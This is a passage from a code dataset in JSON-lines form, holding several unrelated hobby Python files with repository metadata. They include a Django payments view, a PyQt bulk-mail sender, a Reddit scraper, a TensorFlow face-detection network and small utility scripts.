redirect(str(redirect_to))\n return TemplateResponse(\n request, \"plans_payments/payment.html\", {\"form\": form, \"payment\": payment}\n )\n\n\ndef get_client_ip(request):\n return request.META.get(\"REMOTE_ADDR\")\n\n\ndef create_payment_object(\n payment_variant, order, request=None, autorenewed_payment=False\n):\n Payment = get_payment_model()\n if (\n hasattr(order.user.userplan, \"recurring\")\n and order.user.userplan.recurring.payment_provider != payment_variant\n ):\n order.user.userplan.recurring.delete()\n return Payment.objects.create(\n variant=payment_variant,\n order=order,\n description=f\"{order.name} %s purchase\",\n total=Decimal(order.total()),\n tax=Decimal(order.tax_total()),\n currency=order.currency,\n delivery=Decimal(0),\n billing_first_name=order.user.first_name,\n billing_last_name=order.user.last_name,\n billing_email=order.user.email or \"\",\n billing_address_1=order.user.billinginfo.street,\n # billing_address_2=order.user.billinginfo.zipcode,\n billing_city=order.user.billinginfo.city,\n billing_postcode=order.user.billinginfo.zipcode,\n billing_country_code=order.user.billinginfo.country,\n # billing_country_area=order.user.billinginfo.zipcode,\n customer_ip_address=get_client_ip(request) if request else \"127.0.0.1\",\n autorenewed_payment=autorenewed_payment,\n )\n\n\nclass CreatePaymentView(LoginRequiredMixin, View):\n login_url = reverse_lazy(\"auth_login\")\n\n def get(self, request, *args, order_id=None, payment_variant=None):\n order = get_object_or_404(Order, pk=order_id, user=request.user)\n payment = create_payment_object(payment_variant, order, request)\n return redirect(reverse(\"payment_details\", kwargs={\"payment_id\": payment.id}))\n","repo_name":"PetrDlouhy/django-plans-payments","sub_path":"plans_payments/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"48"} +{"seq_id":"41267546649","text":"from fpdf import FPDF\nimport os\n# create a instance of fpdf\npdf = FPDF()\npdf.set_auto_page_break(0)\n\npath = r'C:\\Users\\ahamm\\Desktop\\munseer'\nimg_list = [x for x in os.listdir(path)]\n\nfor img in img_list:\n image_path = os.path.join(path, img)\n if os.path.exists(image_path):\n pdf.add_page()\n pdf.image(image_path)\n\npdf.output(r\"C:\\Users\\ahamm\\Desktop\\PROJECT\\output\\sample.pdf\")","repo_name":"Nareshwill/playground","sub_path":"scratch_29.py","file_name":"scratch_29.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17173439916","text":"from PyQt5 import QtGui, QtCore\nfrom PyQt5.QtWidgets import QApplication, QFileDialog, QGridLayout, QHBoxLayout,QVBoxLayout, QLabel, QLineEdit, QMainWindow, QPushButton, QStyle, QTextEdit, QTimeEdit, QVBoxLayout, QWidget\nimport json\nfrom PyQt5.QtCore import QByteArray, QTimer, Qt\nimport smtplib\nfrom PyQt5.QtGui import QMovie\nimport time\nfrom mov import movie\n\n\nclass MyWindow(QMainWindow):\n def __init__(self, parent=None):\n super(MyWindow, self).__init__(parent)\n self.setGeometry(910, 200, 600, 500)\n\n with open ('json/newfile.json', 'r') as file:\n data= json.load(file)\n\n sender_mail= data['sender_mail']\n sender_pass= data['sender_pass']\n\n self.from_label= QLabel(\"From :\")\n self.from_label.setStyleSheet(\"font: 9pt;\" \"font-weight: bold;\" )\n self.from_label.setMaximumSize(70, 50)\n\n self.from_txt= QLineEdit(sender_mail)\n self.from_txt.setFixedWidth(380)\n self.from_txt.setFixedHeight(33)\n # self.from_txt.setReadOnly(True)\n self.from_txt.setStyleSheet(\"font: 8pt;\" \"font-weight: bold;\" )\n\n self.label1= QLabel(\"Subject :\")\n self.label1.setStyleSheet(\"font: 9pt;\" \"font-weight: bold;\" )\n\n self.line1= QTextEdit() \n self.line1.setMaximumSize(900,52)\n self.line1.setStyleSheet(\"font: 8pt;\" \"font-weight: bold;\" )\n \n self.label2= QLabel(\"Content :\")\n self.label2.setStyleSheet(\"font: 9pt;\" \"font-weight: bold;\" )\n self.line2= QTextEdit()\n\n self.send_btn= QPushButton(\"SEND\")\n self.send_btn.clicked.connect(self.send)\n self.send_btn.setStyleSheet(\"font: 9pt;\" \"font-weight: bold;\" )\n\n self.layout= QVBoxLayout()\n self.layout1= QHBoxLayout()\n\n self.layout.addLayout(self.layout1)\n\n self.layout1.addWidget(self.from_label)\n self.layout1.addWidget(self.from_txt, alignment= Qt.AlignLeft)\n\n self.layout.addWidget(self.label1)\n self.layout.addWidget(self.line1)\n self.layout.addWidget(self.label2)\n self.layout.addWidget(self.line2)\n self.layout.addWidget(self.send_btn, alignment= Qt.AlignRight)\n\n widget = QWidget()\n widget.setLayout(self.layout)\n\n self.setCentralWidget(widget) \n\n\n def send(self):\n print(self.line1.toPlainText())\n print(self.line2.toPlainText())\n with open ('json/newfile.json', 'r') as file:\n data= json.load(file) \n\n sender_mail= data['sender_mail']\n sender_pass= data['sender_pass']\n\n allmails= data['reciever_mail']\n print(allmails)\n valid_mails= []\n invalid_mails= []\n mail_subject= self.line1.toPlainText()\n mail_content= self.line2.toPlainText() \n \n for item in range ( len(allmails) ) :\n self.movie = QMovie('g.gif' , QByteArray(), self)\n self.movie.setSpeed(100)\n self.label2.setMovie(self.movie)\n self.movie.start() \n QApplication.processEvents() \n time.sleep(3) \n each_mail= data['reciever_mail'][item]\n\n print(\"mail: \" +data['reciever_mail'][item]) \n\n sent_from = sender_mail\n to = each_mail #, 'bill@gmail.com' \n subject = mail_subject\n body = mail_content+ \"\\n\\n- VITAM\"\n\n email_text = \"\"\"\\\n From: %s\n To: %s\n Subject: %s\n\n %s\n \"\"\" % (sent_from, \", \".join(to), subject, body)\n\n try:\n server = smtplib.SMTP_SSL('smtp.gmail.com', 465)\n server.ehlo()\n server.login(sender_mail, sender_pass)\n server.sendmail(sent_from, to, email_text)\n server.close()\n\n print ('Email sent!')\n valid_mails.append(each_mail)\n except:\n print('Something went wrong...')\n invalid_mails.append(each_mail)\n self.label2.setText('Content :')\n\n\n def signal(self):\n self.movie = QMovie('photos/giphy.gif' , QByteArray(), self)\n self.movie.setSpeed(100)\n # QApplication.processEvents() \n self.label2.setMovie(self.movie)\n self.movie.start() \n # self.send() \n\n def stop(self):\n self.movie.stop() \n\n\n# if __name__ == \"__main__\":\n# import sys\n\n# app = QApplication(sys.argv)\n# app.setApplicationName('Mail')\n\n# main = MyWindow()\n# main.setWindowIcon(QtGui.QIcon(\"photos/mail.svg\"))\n\n# main.show()\n\n# sys.exit(app.exec_())","repo_name":"DGhanShyam/PythonGUI","sub_path":"mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":4645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"27444190784","text":"import praw\r\nimport datetime\r\nimport pandas as pd\r\nimport json\r\n\r\ndef define_credentials():\r\n with open('credentials.json') as json_file:\r\n data = json.load(json_file)\r\n reddit = praw.Reddit(\r\n client_id=data[\"client_id\"],\r\n client_secret=data[\"client_secret\"],\r\n user_agent=data[\"user_agent\"]\r\n )\r\n return reddit\r\n\r\n\r\ndef get_data(subreddit):\r\n reddit = define_credentials()\r\n subreddit = reddit.subreddit(subreddit)\r\n posts = subreddit.new(limit=10)\r\n ids = []\r\n timestamps = []\r\n comment_num = []\r\n score = []\r\n title = []\r\n for post in posts:\r\n ids.append(post.id)\r\n timestamps.append(datetime.datetime.fromtimestamp(post.created_utc, tz=datetime.timezone.utc))\r\n comment_num.append(post.num_comments)\r\n score.append(post.score)\r\n title.append(post.title)\r\n dict_posts = {\r\n \"id\": ids,\r\n \"timestamp\": timestamps,\r\n \"comment_num\" : comment_num,\r\n \"score\": score,\r\n \"title\": title\r\n }\r\n posts = pd.DataFrame(dict_posts)\r\n return posts\r\n\r\n","repo_name":"weronikakedzior/large-scale-data-processing","sub_path":"l2/project_1/app/reddit_scraper.py","file_name":"reddit_scraper.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35340562112","text":"import numpy as np\r\nimport tensorflow as tf\r\nfrom CFG.config import FLAGS\r\nfrom Prepare_TrainDataSet.GetMiniBatch import GetMiniBatch\r\nimport tensorflow.contrib.slim as slim\r\n#slim = tf.contrib.slim\r\nnum_filters_list = [32, 64, 128, 256]\r\n\r\n\r\ndef loss_branch(input_data, prefix_name, mask=None, label=None, deploy_flag=False):\r\n branch_conv1 = slim.conv2d(input_data, num_filters_list[2], [1,1],1,'VALID')\r\n # branch_conv1 = tf.nn.conv2d(input_data, filter=[1,1,num_filters_list[0],num_filters_list[2]],strides=[1,1,1,1],padding='VALID',name=prefix_name + '_1')\r\n # branch_relu1 = tf.nn.relu(branch_conv1, name='relu_' + prefix_name + '_1')\r\n\r\n # face classification,这里是是获得预测人脸概率的特征图\r\n branch_conv2_score = slim.conv2d(branch_conv1, num_filters_list[2], [1,1],1,'VALID')\r\n #branch_conv2_score = tf.nn.conv2d(branch_relu1, filter=[1,1,num_filters_list[2],num_filters_list[2]],strides=[1,1,1,1],padding='VALID',name=prefix_name + '_2_score')\r\n #branch_relu2_score = tf.nn.relu(branch_conv2_score, name='relu_' + prefix_name + '_2_score')\r\n branch_conv3_score = slim.conv2d(branch_conv2_score, 2 , [1,1],1,'VALID', activation_fn=None)\r\n #branch_conv3_score = tf.nn.conv2d(branch_relu1, filter=[1,1,num_filters_list[2],2],strides=[1,1,1,1],padding='VALID',name=prefix_name + '_3_score')\r\n\r\n branch_conv2_bbox = slim.conv2d(branch_conv1, num_filters_list[2], [1,1],1,'VALID')\r\n # branch_conv2_bbox = tf.nn.conv2d(branch_relu1, filter=[1, 1, num_filters_list[2], num_filters_list[2]],\r\n # strides=[1, 1, 1, 1], padding='VALID', name=prefix_name + '_2_bbox')\r\n # branch_relu2_bbox = tf.nn.relu(branch_conv2_score, name='relu_' + prefix_name + '_2_bbox')\r\n branch_conv3_bbox = slim.conv2d(branch_conv2_bbox, 4 , [1,1],1,'VALID', activation_fn=None)\r\n # branch_conv3_bbox = tf.nn.conv2d(branch_relu1, filter=[1, 1, num_filters_list[2], 4], strides=[1, 1, 1, 1],\r\n # padding='VALID', name=prefix_name + '_3_bbox')\r\n\r\n if deploy_flag:\r\n predict_score = tf.nn.softmax(branch_conv3_score,axis=1)\r\n #predict_score = tf.slice(predict_score,)\r\n predict_bbox = branch_conv3_bbox\r\n return predict_score, predict_bbox\r\n else:\r\n #总共有6层分割出前面两层,代表正负样本\r\n mask_score = tf.slice(mask, [0,0,0,0],[input_data.shape[0], input_data.shape[1],input_data.shape[2], 2],name='mask_score')\r\n mask_score_reshape = tf.reshape(mask_score,[-1,2])\r\n mask_score_reshape_sum = tf.reduce_sum(mask_score_reshape,axis=1)\r\n positive_index = tf.where(tf.equal(mask_score_reshape_sum, 0) )\r\n positive_mask_score = tf.gather(mask_score_reshape,positive_index,axis= 0 )\r\n #positive_mask_score_shape = tf.shape(positive_mask_score)\r\n\r\n\r\n\r\n label_score = tf.slice(label, [0, 0, 0, 0],\r\n [input_data.shape[0], input_data.shape[1], input_data.shape[2], 2], name='label_score')\r\n label_score_reshape = tf.reshape(label_score,[-1,2])\r\n positive_label_score = tf.gather(label_score_reshape,positive_index,axis= 0 )\r\n #mask_filter = tf.multiply(branch_conv3_score,mask_score)\r\n #loss_score = tf.nn.softmax_cross_entropy_with_logits_v2(label_score, mask_filter, axis=3)\r\n loss_score = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits_v2(positive_label_score,positive_mask_score,axis=1) )\r\n\r\n\r\n #负样本的mask_batch[loop, 0:2, :, :] = 1 后面mask_batch[loop, 2:6, :, :] = 0\r\n #正样本的mask_batch[loop, 0:2, :, :] = 0 后面mask_batch[loop, 2:6, :, :] = 1\r\n #对于正样本来说,score_gray_flag 那么分类就可以置为0,但是回归却是location_green_flag 才可以置为1.缩小了范围。\r\n mask_bbox = tf.slice(mask, [0,0,0,2],[input_data.shape[0], input_data.shape[1],input_data.shape[2], 4],name='mask_bbox')\r\n mask_bbox_reshape = tf.reshape(mask_bbox, [-1,4])\r\n mask_bbox_reshape_sum = tf.reduce_sum(mask_bbox_reshape, axis=1)\r\n positive_bbox_index = tf.where(tf.equal(mask_bbox_reshape_sum, 0))\r\n positive_bbox_mask = tf.gather(mask_bbox_reshape,positive_bbox_index, axis=0)\r\n\r\n label_bbox = tf.slice(label, [0, 0, 0, 2],\r\n [input_data.shape[0], input_data.shape[1], input_data.shape[2], 4], name='label_bbox')\r\n label_bbox_reshape = tf.reshape(label_bbox,[-1, 4])\r\n positive_bbox_label = tf.gather(label_bbox_reshape, positive_bbox_mask, axis=0)\r\n loss_bbox = tf.reduce_mean( tf.reduce_sum(tf.abs(tf.sub(positive_bbox_mask, positive_bbox_label) ), axis = 1) )\r\n\r\n return loss_bbox, loss_score\r\n\r\n\r\ndef inference(input,masks, labels, deploy_flag=False):\r\n #480 - 3 + 1 / 2 = 478/2 = 239 不填充\r\n mask_1 = masks[0]\r\n mask_2 = masks[1]\r\n mask_3 = masks[2]\r\n mask_4 = masks[3]\r\n\r\n label_1 = labels[0]\r\n label_2 = labels[1]\r\n label_3 = labels[2]\r\n label_4 = labels[3]\r\n#239,239\r\n conv1 = slim.conv2d(input,num_filters_list[1], [3,3], 2,'VALID')\r\n#119,119\r\n #239 - 3 + 1 / 2 = 237 / 2 = 118.5 = 119\r\n conv2 = slim.conv2d(conv1,num_filters_list[1], [3,3], 2,'VALID')\r\n\r\n #59\r\n conv3 = slim.conv2d(conv2,num_filters_list[1], [3,3], 2,'VALID')\r\n\r\n # 59/1 = 59\r\n conv4 = slim.conv2d(conv3,num_filters_list[1], [3,3], 1,'SAME')\r\n\r\n\r\n conv5 = slim.conv2d(conv4,num_filters_list[1], [3,3], 1,'SAME')\r\n\r\n conv6 = slim.conv2d(conv5,num_filters_list[1], [3,3], 1,'SAME')\r\n # conv6 = tf.nn.conv2d(relu5, [3, 3, num_filters_list[1], num_filters_list[1]], strides=[1, 1, 1, 1],padding='SAME',name='conv6')\r\n # relu6 = tf.nn.relu(conv6, name='relu6')\r\n\r\n conv7 = slim.conv2d(conv6, num_filters_list[1], [3, 3], 1, 'SAME')\r\n\r\n conv8 = slim.conv2d(conv7, num_filters_list[1], [3, 3], 1, 'SAME')\r\n # conv8 = tf.nn.conv2d(relu7, [3, 3, num_filters_list[1], num_filters_list[1]], strides=[1, 1, 1, 1],padding='SAME',name='conv8')\r\n # relu8 = tf.nn.relu(conv8, name='relu8')\r\n\r\n conv9 = slim.conv2d(conv8, num_filters_list[1], [3, 3], 1, 'SAME')\r\n # conv9 = tf.nn.conv2d(relu8, [3, 3, num_filters_list[1], num_filters_list[1]], strides=[1, 1, 1, 1],padding='SAME',name='conv9')\r\n # relu9 = tf.nn.relu(conv9, name='relu9')\r\n\r\n conv10 = slim.conv2d(conv9, num_filters_list[1], [3, 3], 1, 'SAME')\r\n # conv10 = tf.nn.conv2d(relu9, [3, 3, num_filters_list[1], num_filters_list[1]], strides=[1, 1, 1, 1], padding='SAME',name='conv10')\r\n # relu10 = tf.nn.relu(conv10, name='relu10')\r\n\r\n conv11 = slim.conv2d(conv10, num_filters_list[1], [3, 3], 1, 'SAME',activation_fn=None)\r\n #conv11 = tf.nn.conv2d(relu10, [3, 3, num_filters_list[1], num_filters_list[1]], strides=[1, 1, 1, 1],padding='SAME',name='conv11')\r\n conv11 = conv11 + conv9#为什么9有激活\r\n relu11 = tf.nn.relu(conv11)\r\n\r\n #relu17 shape = [batch_size, 59,59, 32 ]\r\n\r\n if deploy_flag:\r\n predict_score_1, predict_bbox_1 = loss_branch(relu11, 'conv11', deploy_flag=deploy_flag)\r\n else:\r\n loss_score_1, loss_bbox_1 = loss_branch(relu11, 'conv11', mask= mask_1, label=label_1)\r\n #第一个分支结束\r\n\r\n conv12 = slim.conv2d(relu11, num_filters_list[2], [3, 3], 2, 'VALID')\r\n # conv12 = tf.nn.conv2d(relu11, [3, 3, num_filters_list[1], num_filters_list[2]], strides=[1,2,2,1], padding='VALID',name='conv12')\r\n # relu12 = tf.nn.relu(conv12, name='relu12')\r\n\r\n conv13 = slim.conv2d(conv12, num_filters_list[2], [3, 3], 1, 'SAME')\r\n # conv13 = tf.nn.conv2d(relu12, [3,3,num_filters_list[2], num_filters_list[2]], strides=[1,1,1,1],padding='SAME',name='conv13')\r\n # relu13 = tf.nn.relu(conv13, name='relu13')\r\n\r\n conv14 = slim.conv2d(conv13, num_filters_list[2], [3, 3], 1, 'SAME',activation_fn=None)\r\n #conv14 = tf.nn.conv2d(relu13, [3, 3, num_filters_list[2], num_filters_list[2]], strides=[1, 1, 1, 1],padding='SAME', name='conv14')\r\n conv14 = conv14 + conv12\r\n relu14 = tf.nn.relu(conv14)\r\n\r\n if deploy_flag:\r\n predict_score_2, predict_bbox_2 = loss_branch(relu14, 'conv14', deploy_flag=deploy_flag)\r\n else:\r\n loss_score_2, loss_bbox_2 = loss_branch(relu14, 'conv14', mask= mask_2, label=label_2)\r\n #第2个分支结束\r\n\r\n conv15 = slim.conv2d(relu14, num_filters_list[2], [3, 3], 2, 'VALID')\r\n # conv15 = tf.nn.conv2d(relu14, [3, 3, num_filters_list[2], num_filters_list[2]], strides=[1, 2, 2, 1],\r\n # padding='VALID', name='conv15')\r\n # relu15 = tf.nn.relu(conv15, name='relu15')\r\n\r\n conv16 = slim.conv2d(conv15, num_filters_list[2], [3, 3], 1, 'SAME')\r\n # conv16 = tf.nn.conv2d(relu15, [3, 3, num_filters_list[2], num_filters_list[2]], strides=[1, 1, 1, 1],\r\n # padding='SAME', name='conv16')\r\n # relu16 = tf.nn.relu(conv16, name='relu16')\r\n conv17 = slim.conv2d(conv16, num_filters_list[2], [3, 3], 1, 'SAME', activation_fn=None)\r\n # conv17 = tf.nn.conv2d(relu16, [3, 3, num_filters_list[2], num_filters_list[2]], strides=[1, 1, 1, 1],\r\n # padding='SAME', name='conv17')\r\n conv17 = conv17 + conv15\r\n # relu17 = tf.nn.relu(conv17, name='relu17')\r\n relu17 = tf.nn.relu(conv17)\r\n\r\n\r\n if deploy_flag:\r\n predict_score_3, predict_bbox_3 = loss_branch(relu14, 'conv17', deploy_flag=deploy_flag)\r\n else:\r\n loss_score_3, loss_bbox_3 = loss_branch(relu14, 'conv17', mask=mask_3, label=label_3)\r\n # 第3个分支结束\r\n\r\n conv18 = slim.conv2d(relu17, num_filters_list[2], [3, 3], 2, 'VALID')\r\n # conv18 = tf.nn.conv2d(relu17, [3, 3, num_filters_list[1], num_filters_list[2]], strides=[1, 2, 2, 1],\r\n # padding='VALID', name='conv18')\r\n # relu18 = tf.nn.relu(conv18, name='relu18')\r\n\r\n conv19 = slim.conv2d(conv18, num_filters_list[2], [3, 3], 1, 'SAME')\r\n # conv19 = tf.nn.conv2d(relu18, [3, 3, num_filters_list[2], num_filters_list[2]], strides=[1, 1, 1, 1],\r\n # padding='SAME', name='conv19')\r\n # relu19 = tf.nn.relu(conv19, name='relu19')\r\n\r\n conv20 = slim.conv2d(conv19, num_filters_list[2], [3, 3], 1, 'SAME',activation_fn=None)\r\n # conv20 = tf.nn.conv2d(relu19, [3, 3, num_filters_list[2], num_filters_list[2]], strides=[1, 1, 1, 1],\r\n # padding='SAME', name='conv20')\r\n conv20 = conv20 + conv18\r\n relu20 = tf.nn.relu(conv20)\r\n\r\n if deploy_flag:\r\n predict_score_4, predict_bbox_4 = loss_branch(relu20, 'conv20', deploy_flag=deploy_flag)\r\n else:\r\n loss_score_4, loss_bbox_4 = loss_branch(relu20, 'conv20', mask=mask_4, label=label_4)\r\n # 第4个分支结束\r\n\r\n if deploy_flag:\r\n net = tf.group(predict_score_1, predict_bbox_1,\r\n predict_score_2, predict_bbox_2,\r\n predict_score_3, predict_bbox_3,\r\n predict_score_4, predict_bbox_4)\r\n return net\r\n else:\r\n net = tf.group(loss_score_1, loss_bbox_1,\r\n loss_score_2, loss_bbox_2,\r\n loss_score_3, loss_bbox_3,\r\n loss_score_4, loss_bbox_4)\r\n total_loss = loss_score_1 + loss_bbox_1 + \\\r\n loss_score_2 + loss_bbox_2 + \\\r\n loss_score_3 + loss_bbox_3 + \\\r\n loss_score_4 + loss_bbox_4\r\n\r\n return total_loss #net, data_names, label_names\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n tf_img_batch = tf.placeholder(dtype=tf.float32, shape=[FLAGS['batch_size'], FLAGS['input_h'], FLAGS['input_w'], 3],name='tf_img_batch')\r\n\r\n tf_mask1_batch = tf.placeholder(dtype=tf.float32, shape=[FLAGS['batch_size'], FLAGS['feature_map_size_list'][0], FLAGS['feature_map_size_list'][0], 64],name='tf_mask_batch1')\r\n tf_mask2_batch = tf.placeholder(dtype=tf.float32, shape=[FLAGS['batch_size'], FLAGS['feature_map_size_list'][1],FLAGS['feature_map_size_list'][1], 128],name='tf_mask_batch2')\r\n tf_mask3_batch = tf.placeholder(dtype=tf.float32, shape=[FLAGS['batch_size'], FLAGS['feature_map_size_list'][2],\r\n FLAGS['feature_map_size_list'][2], 128],name='tf_mask_batch3')\r\n tf_mask4_batch = tf.placeholder(dtype=tf.float32, shape=[FLAGS['batch_size'], FLAGS['feature_map_size_list'][3],\r\n FLAGS['feature_map_size_list'][3], 128],name='tf_mask_batch4')\r\n\r\n tf_label1_batch = tf.placeholder(dtype=tf.float32, shape=[FLAGS['batch_size'], FLAGS['feature_map_size_list'][0],\r\n FLAGS['feature_map_size_list'][0], 64],\r\n name='tf_mask_label1')\r\n tf_label2_batch = tf.placeholder(dtype=tf.float32, shape=[FLAGS['batch_size'], FLAGS['feature_map_size_list'][1],\r\n FLAGS['feature_map_size_list'][1], 128],\r\n name='tf_mask_label2')\r\n tf_label3_batch = tf.placeholder(dtype=tf.float32, shape=[FLAGS['batch_size'], FLAGS['feature_map_size_list'][2],\r\n FLAGS['feature_map_size_list'][2], 128],\r\n name='tf_mask_label3')\r\n tf_label4_batch = tf.placeholder(dtype=tf.float32, shape=[FLAGS['batch_size'], FLAGS['feature_map_size_list'][3],\r\n FLAGS['feature_map_size_list'][3], 128],\r\n name='tf_mask_label4')\r\n\r\n MiniBatch = GetMiniBatch()\r\n img_batch , mask_batch, label_batch = MiniBatch.PrepareMinibatch()\r\n #img_batch = np.reshape(img_batch,[16,480,480,3])\r\n\r\n global_step = tf.Variable(0, trainable=False, name='global_step')\r\n total_loss = inference(img_batch, mask_batch, label_batch)\r\n optimizer = tf.train.AdamOptimizer(0.001)\r\n train_op = optimizer.minimize(total_loss)\r\n step = 0\r\n with tf.Session() as sess:\r\n init_op = tf.global_variables_initializer()\r\n sess.run(init_op)\r\n\r\n\r\n while step < 1000:\r\n\r\n _, sum_loss = sess.run([train_op,total_loss], feed_dict={tf_img_batch:img_batch[0],\r\n tf_mask1_batch: mask_batch[0], tf_mask2_batch:mask_batch[1], \\\r\n tf_mask3_batch: mask_batch[2], tf_mask4_batch: mask_batch[3], \\\r\n tf_label1_batch: label_batch[0], tf_label2_batch: label_batch[1], \\\r\n tf_label3_batch: label_batch[2], tf_label4_batch: label_batch[3], \\\r\n })\r\n print('Total Loss : ',sum_loss)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"guochen005X/GC_LFFD","sub_path":"Net_Work/infefence.py","file_name":"infefence.py","file_ext":"py","file_size_in_byte":14781,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71404997906","text":"\n\n\n\nfilename = r'D:\\school\\machine learning\\ex3\\four_circle.txt'\nout_f = r'D:\\school\\machine learning\\ex3\\four_circle.csv'\n\ndata = []\nwith open(filename) as f:\n for line in f:\n new_line = line.split(\" \")\n str = ''\n for w in new_line:\n str += f'{w},'\n str = str[:len(str)-1]\n data += [str]\n print(data)\n\nwith open(out_f,'a+') as f:\n for line in data:\n f.write(line)\n","repo_name":"kolron/intro_to_ml","sub_path":"ex3/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73041106705","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time: 2022/10/9\n# @Author: xuef\n# @File: get_all_case_files.py\n# @Desc: 获取所有用例文件\n\nimport os\n\n\ndef get_all_files(file_dir: str) -> list:\n \"\"\"\n param file_path: 文件目录\n \"\"\"\n files_path = []\n if not os.path.exists(file_dir):\n raise FileNotFoundError('当前文件夹不存在')\n for root, dirs, files in os.walk(file_dir):\n for file in files:\n path = os.path.join(root, file)\n files_path.append(path)\n return files_path\n\n\n\n","repo_name":"xuefengji/py-api-automation","sub_path":"utils/file/get_all_case_files.py","file_name":"get_all_case_files.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"48"} +{"seq_id":"40551065293","text":"from django.urls import path\nfrom .views import * \n\nurlpatterns = [\n\n path('',HomeView.as_view(),name = 'TeacherHomeView'),\n path('post_create/',PostCreateView.as_view(),name = \"post_create\"),\n path('post_update/<int:pk>',PostUpdateView.as_view(),name = \"post_update\"),\n path('delete/<str:pk>',delete,name = 'delete'),\n \n\n]","repo_name":"urvisuthar85/task","sub_path":"teachers/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34275685200","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.decomposition import PCA\n\niris_df = pd.read_csv(\"../data/iris.csv\", low_memory=False)\nfeatures = ['sepal length', 'sepal width'] \n\ntargets = ['Iris-setosa', 'Iris-versicolor', 'Iris-virginica']\ntarget_names = targets\niris_df.iris.replace(targets, [0, 1, 2], inplace=True)\n\nX = iris_df [features].values # matrix\ny = iris_df ['iris'].values\n\npca = PCA(n_components=2)\nX_r = pca.fit(X).transform(X)\n\nprint('explained variance ratio with the first two components: %s for features %s'\n % (str(pca.explained_variance_ratio_), features))\n\ncolors = ['r', 'g', 'b']\nmarkers = [\"*\", 'o', 'd']\nlw = 2\n\nfor color, marker, i, target_name in zip(colors, markers, [0, 1, 2], target_names):\n plt.scatter(X_r[y == i, 0], X_r[y == i, 1], color=color, marker=marker, alpha=.8, lw=lw,\n label=target_name)\nplt.legend(loc='best', shadow=False, scatterpoints=1)\nplt.title('2-component PCA of IRIS dataset with sepal length and width')\n\nplt.show()\n","repo_name":"bmoretz/Python-Machine-Learning","sub_path":"samples/ch08/iris_sepal_pca.py","file_name":"iris_sepal_pca.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35936036654","text":"import Averages, Assignments, GradesRegex\n\ndef prompt():\n print('\\nThis program will calculate the grade of all of your classes.')\n print(\"If you wish to view the changes, type M to go back to main screen.\")\n print('Typing any symbols below will give you more information.')\n print('Type > then the subject to see all the specific assignments a class.')\n print('Type + to add an assignment to a class.')\n print('Type - to delete an assignment from a class.')\n print('Type | to edit an assignment in a class.')\n print('Type quit to quit from program.')\n print('\\n')\n\ndef mainScreen():\n print('Averages for Each Class:')\n Assignments.readPaths()\n Averages.printAllClassAverages()\n print('\\n')\n\ndef classCondition(condition): # Checks condition if it's none or false\n if condition == None: # If none, then ran but was aborted\n pass\n else: # If false, didn't answer a right class\n print('Enter a class next time\\n')\n user_response = eContinue('?')\n return user_response # Does this with continue to avoid printing b_and_a\n\ndef eContinue(response): # Gets the user to manually continue, also gets a response\n while response != '':\n response = input('\\nPress Enter to continue.')\n prompt()\n response = input()\n return response#g\n\ndef viewPath():\n user_response = input('What class would you like to view?\\n')\n if user_response in Assignments.all_subjectsv2:\n Assignments.print_assignments(user_response)\n else:\n print('Enter a class next time\\n')\n\ndef addPath():\n print('Type abort to abort the action.')\n user_response = input('What class would you like to add to?\\n')\n if user_response in Assignments.all_subjectsv2:\n outcome = Assignments.adding_assignments(user_response)\n if outcome != False: # if false not returned, ran sucessfully\n print('Done')\n return True\n else:\n print('\\nAborted.')\n return None\n elif user_response == 'abort':\n print('\\nAborted.')\n return None\n else:\n return False\n\ndef editPath(): # Kinda follow delPath(), but changing dict keys no actually deleting them\n user_response = input('What class would you like to edit?\\n')\n for i in range(len(Assignments.all_subjectsv2)):\n if user_response == Assignments.all_subjectsv2[i]:\n Assignments.print_assignments(user_response)\n user_assignment = input('\\nType the assignment name you want to change(BE VERY SPECIFIC!):\\n')\n while len(user_assignment) < 4:\n user_assignment = input('\\nPlease enter more then 4 char for this to be accurate!\\n')\n outcome = GradesRegex.customRegex(user_assignment.title(), i, '|')\n if outcome == False: # If false, error occured\n print('Next time, enter a valid assignment.\\n')\n return None # So that it doesnt run b_and_a\n elif outcome == None:\n return None\n else:\n print('Grade changed.')\n return True # return true if no aborted, so that it runs b_and_a\n else:\n pass\n return False # Otherwise, user didn't input valid class\n\ndef delPath():\n user_response = input('What class\\'s assignment would you like to delete?\\n')\n for i in range(len(Assignments.all_subjectsv2)):\n if user_response == Assignments.all_subjectsv2[i]: # Remember, only runs if its ==\n Assignments.print_assignments(user_response)\n user_assignment = input('\\nType the assignment name you want to delete(BE VERY SPECIFIC!):\\n')\n while len(user_assignment) < 4:\n user_assignment = input('\\nPlease enter more then 4 char for this to be accurate!\\n')\n outcome = GradesRegex.customRegex(user_assignment.title(), i, '-')\n if outcome != True:\n if outcome == False:\n print('Next time, enter a valid assignment.\\n')\n elif outcome == None:\n print('\\nDeletion aborted.')\n return None\n else:\n print('\\nAssignment deleted.')\n return True\n else:\n pass\n return False\n\npaths = ['>', '+', '-', '|', 